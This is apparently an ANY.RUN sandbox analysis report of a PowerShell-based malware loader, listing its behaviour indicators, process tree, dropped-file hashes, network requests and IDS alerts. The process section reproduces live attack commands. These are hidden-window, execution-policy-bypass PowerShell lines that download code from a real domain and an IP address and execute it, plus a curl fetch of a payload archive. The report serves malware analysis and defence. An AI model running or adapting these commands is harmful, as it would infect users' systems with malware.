File name:

pOwERShElL -W HIddEn -Nologo -nOp.txt

Full analysis: https://app.any.run/tasks/d72fc224-da94-479f-b99e-e7527cd4d4d0
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: February 19, 2025, 09:41:08
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
opendir
loader
arch-exec
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with CRLF line terminators
MD5:

8B705D59BD5C5C2E8FACD91102A53F02

SHA1:

2D955696C084E1C90B14A3DC11D393A12065EA1E

SHA256:

930BD02C8F1D4C9524058FDBEB4E1C4FD8B122C8C8882680CD8DC2784ACDC363

SSDEEP:

24:spykp1CRDyhSSEp1CRD8q1CRDozkJ1CRDDy1CRDoAZv+5Jf:spyc1OPS81O71Ok81ODy1OPWf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 444)
      • powershell.exe (PID: 6412)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 768)
      • powershell.exe (PID: 1916)

    • Request from PowerShell that ran from MSHTA.EXE

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 444)
      • powershell.exe (PID: 6412)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 1916)
      • powershell.exe (PID: 768)

    • Changes powershell execution policy (Bypass)

      • mshta.exe (PID: 2828)
      • mshta.exe (PID: 6092)
      • mshta.exe (PID: 4840)
      • cmd.exe (PID: 3560)

  • SUSPICIOUS

    • Executes script without checking the security policy

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 444)
      • powershell.exe (PID: 6412)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 1916)
      • powershell.exe (PID: 768)

    • Starts process via Powershell

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)

    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 2828)
      • mshta.exe (PID: 6092)
      • mshta.exe (PID: 4840)
      • cmd.exe (PID: 3560)

    • Kill processes via PowerShell

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 444)
      • powershell.exe (PID: 6412)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 768)
      • powershell.exe (PID: 1916)

    • Found IP address in command line

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)

    • Removes files via Powershell

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)

    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 2828)
      • mshta.exe (PID: 6092)
      • mshta.exe (PID: 4840)
      • cmd.exe (PID: 3560)

    • Connects to the server without a host name

      • mshta.exe (PID: 2828)
      • powershell.exe (PID: 6724)
      • curl.exe (PID: 7020)
      • powershell.exe (PID: 6296)
      • curl.exe (PID: 904)
      • powershell.exe (PID: 648)
      • curl.exe (PID: 7164)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)

    • Executing commands from a ".bat" file

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)

    • Process requests binary or script from the Internet

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)

    • Executable content was dropped or overwritten

      • tar.exe (PID: 6972)
      • tar.exe (PID: 4244)
      • tar.exe (PID: 7144)

    • Manipulates environment variables

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)

    • The executable file from the user directory is run by the CMD process

      • greendesigner.exe (PID: 1732)
      • greendesigner.exe (PID: 5872)
      • greendesigner.exe (PID: 6988)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 3560)

    • The process hides Powershell's copyright startup banner

      • cmd.exe (PID: 3560)

  • INFO

    • Manual execution by a user

      • cmd.exe (PID: 3560)

    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 5792)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 2828)
      • mshta.exe (PID: 6092)
      • mshta.exe (PID: 4840)

    • Checks proxy server information

      • mshta.exe (PID: 2828)
      • powershell.exe (PID: 6724)
      • mshta.exe (PID: 6092)
      • powershell.exe (PID: 6296)
      • mshta.exe (PID: 4840)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 444)
      • powershell.exe (PID: 6412)
      • powershell.exe (PID: 1916)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 768)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 444)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 6412)
      • powershell.exe (PID: 1916)
      • powershell.exe (PID: 768)

    • Disables trace logs

      • powershell.exe (PID: 6724)
      • powershell.exe (PID: 6296)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 444)
      • powershell.exe (PID: 6412)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 1916)
      • powershell.exe (PID: 768)

    • Create files in a temporary directory

      • curl.exe (PID: 7020)
      • tar.exe (PID: 6972)
      • curl.exe (PID: 904)
      • tar.exe (PID: 4244)
      • curl.exe (PID: 7164)
      • tar.exe (PID: 7144)

    • Checks supported languages

      • curl.exe (PID: 7020)
      • tar.exe (PID: 6972)
      • greendesigner.exe (PID: 1732)
      • curl.exe (PID: 904)
      • greendesigner.exe (PID: 5872)
      • tar.exe (PID: 4244)
      • tar.exe (PID: 7144)
      • greendesigner.exe (PID: 6988)
      • curl.exe (PID: 7164)

    • Execution of CURL command

      • cmd.exe (PID: 7004)
      • cmd.exe (PID: 4228)
      • cmd.exe (PID: 6972)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
160
Monitored processes
32
Malicious processes
12
Suspicious processes
3

Behavior graph

Click at the process to see the details
start notepad.exe no specs cmd.exe conhost.exe no specs mshta.exe powershell.exe conhost.exe no specs cmd.exe no specs curl.exe tar.exe greendesigner.exe no specs aspnet_wp.exe no specs mshta.exe powershell.exe conhost.exe no specs cmd.exe no specs curl.exe tar.exe greendesigner.exe no specs aspnet_wp.exe no specs mshta.exe powershell.exe conhost.exe no specs cmd.exe no specs curl.exe tar.exe greendesigner.exe no specs aspnet_wp.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
188pOwErshEll -w HidDEN -noLOgo -noP -ep ByPASS -c "iex ([Text.Encoding]::UTF8.GetString((iwr "https://yasminasaveursetdecors.fr/dszm").Content))" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
444pOwERShElL -W HIddEn -Nologo -nOp -eP BYPaSs -c "iex ([Text.Encoding]::UTF8.GetString((iwr "https://yasminasaveursetdecors.fr/Wj").Content))" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
648"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep Bypass -nop -c "Stop-Process -Name 'install' -Force; Invoke-WebRequest -Uri 'http://185.121.235.111/cpan/greendesigners.bat' -OutFile ([System.IO.Path]::Combine($env:TEMP, 'greendesigners.bat')); Start-Process -FilePath ([System.IO.Path]::Combine($env:TEMP, 'greendesigners.bat')) -NoNewWindow -Wait; Remove-Item -Path ([System.IO.Path]::Combine($env:TEMP, 'greendesigners.bat')) -Force"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
768pOWERShelL -w hiDDen -nOlogO -Nop -Ep bYPasS -c "iex ([Text.Encoding]::UTF8.GetString((iwr "https://yasminasaveursetdecors.fr/J9AIr").Content))" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
904curl -o "C:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner.zip" http://185.121.235.111/cpan/greendesigner.zipC:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
HIGH
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
1596\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1704"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exegreendesigner.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
aspnet_wp.exe
Exit code:
3221225477
Version:
4.8.9220.0 built by: NET481REL1LAST_C
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\aspnet_wp.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
1732C:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner\greendesigner.exeC:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner\greendesigner.execmd.exe
User:
admin
Integrity Level:
HIGH
Exit code:
3221225477
Modules
Images
c:\users\admin\appdata\local\temp\greendesignerdir\greendesigner\greendesigner.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\users\admin\appdata\local\temp\greendesignerdir\greendesigner\libfilezilla-45.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\users\admin\appdata\local\temp\greendesignerdir\greendesigner\libgcc_s_seh-1.dll
1916POwErSHELL -W hidDeN -nolOGO -nop -Ep bYPaSS -c "iex ([Text.Encoding]::UTF8.GetString((iwr "https://yasminasaveursetdecors.fr/82V1").Content))" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
2612\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
43 205
Read events
43 196
Write events
9
Delete events
0

Modification events

(PID) Process:(2828) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2828) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2828) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(6092) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(6092) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(6092) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(4840) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(4840) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(4840) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
Executable files
24
Suspicious files
9
Text files
20
Unknown types
0

Dropped files

PID
Process
Filename
Type
2828mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_0E7D957F8CAC4DE448BF5D34E62E9B04binary
MD5:DEAF2B367D2AB66D9B355486A7F393F8
SHA256:897250D18B2ED72E5ECCBD5E544C15127C7F38906C122588AE66006469F85913
6972tar.exeC:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner\libgcc_s_seh-1.dllexecutable
MD5:F590ECA82EA34B2D95C782143D45ED33
SHA256:85723F1231608222CAFD34D56A542FE041B94DB1E691431EEEC3449580C2F50F
7020curl.exeC:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner.zipcompressed
MD5:1CE2CF1D5204A3C54C99FDDFA0BAECD9
SHA256:C6214D1C6871853660A1C7278148E8EA7B582F122C71EC8B44DF824BCB8FD214
2828mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\02460F0C5E46824211DA37830EBE26EFbinary
MD5:C7EC124FC01255D84153783FF625A67E
SHA256:E72A16956327234C1A034B58789DD6B1C712DFA67769659936FA55C0CC491B91
6972tar.exeC:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner\greendesigner.exeexecutable
MD5:FB4345E5F8C30AC2239265F14E1AE4EF
SHA256:BBDFD46773B11A15AE87751B81D504DB8C99052FF3D8927D28281ADEE4AF599C
6724powershell.exeC:\Users\admin\AppData\Local\Temp\greendesigners.battext
MD5:779D5E4876F2584670A26B9F28B927C5
SHA256:F70668574CA3149C87676897DB688950A334F34496C8A5735C6DCE8F691FC6A0
6972tar.exeC:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner\libgnutls-30.dllexecutable
MD5:CC70F76637A27F170EBDAF76765F52D3
SHA256:60F5D6CE87AF2C2811348F8E38A4E02B5B1D472C754D8C8F4BCEB50F7F18AB98
6972tar.exeC:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner\libfilezilla-45.dllexecutable
MD5:85FF9CC290C639A3EFF050987143618E
SHA256:47F22047CD916938DB649CE9CF641EA05C1F3175FE39BDD7A2DC1E447788ABAC
6972tar.exeC:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner\libgmp-10.dllexecutable
MD5:C0CA8705BA9DB5FDC359C1096E25E37F
SHA256:ED0AE7D0B532810F5132406228A696F51D59328D0264D552F022563F42F556A1
6972tar.exeC:\Users\admin\AppData\Local\Temp\greendesignerDir\greendesigner\libstdc++-6.dllexecutable
MD5:2BD65247568ADBEE336D3A6FAA0763EF
SHA256:E2B48085B5F658D829FAF8DD33C690CFFD7DFF0AB7C35CA999FB3B0BE803A3C9
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
18
TCP/UDP connections
51
DNS requests
23
Threats
10

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
536
svchost.exe
GET
200
2.16.164.42:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6296
powershell.exe
GET
200
185.121.235.111:80
http://185.121.235.111/cpan/greendesigners.bat
unknown
unknown
4712
MoUsoCoreWorker.exe
GET
200
2.16.164.42:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
536
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5064
SearchApp.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
6520
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7164
curl.exe
GET
200
185.121.235.111:80
http://185.121.235.111/cpan/greendesigner.zip
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
2.16.164.42:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
536
svchost.exe
2.16.164.42:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4712
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
536
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
184.86.251.10:443
www.bing.com
Akamai International B.V.
DE
whitelisted
5064
SearchApp.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
1176
svchost.exe
40.126.31.73:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 20.73.194.208
whitelisted
google.com
  • 142.250.186.174
whitelisted
crl.microsoft.com
  • 2.16.164.42
  • 2.16.164.32
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 2.23.246.101
whitelisted
www.bing.com
  • 184.86.251.10
  • 184.86.251.14
  • 184.86.251.20
  • 184.86.251.18
  • 184.86.251.11
  • 184.86.251.15
  • 184.86.251.12
  • 184.86.251.19
  • 184.86.251.16
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
login.live.com
  • 40.126.31.73
  • 40.126.31.3
  • 40.126.31.71
  • 40.126.31.69
  • 40.126.31.2
  • 40.126.31.130
  • 20.190.159.129
  • 20.190.159.130
whitelisted
go.microsoft.com
  • 92.123.18.10
whitelisted
fp.msedge.net
  • 204.79.197.222
whitelisted
th.bing.com
  • 2.23.227.208
  • 2.23.227.215
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] URL Shortener TinyURL (tinyurl .com)
6724
powershell.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host ZIP Request
6724
powershell.exe
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
6724
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
6296
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
6296
powershell.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host ZIP Request
6296
powershell.exe
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
7164
curl.exe
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
7164
curl.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host ZIP Request
7164
curl.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
pOwERShElL -W HIddEn -Nologo -nOp.txt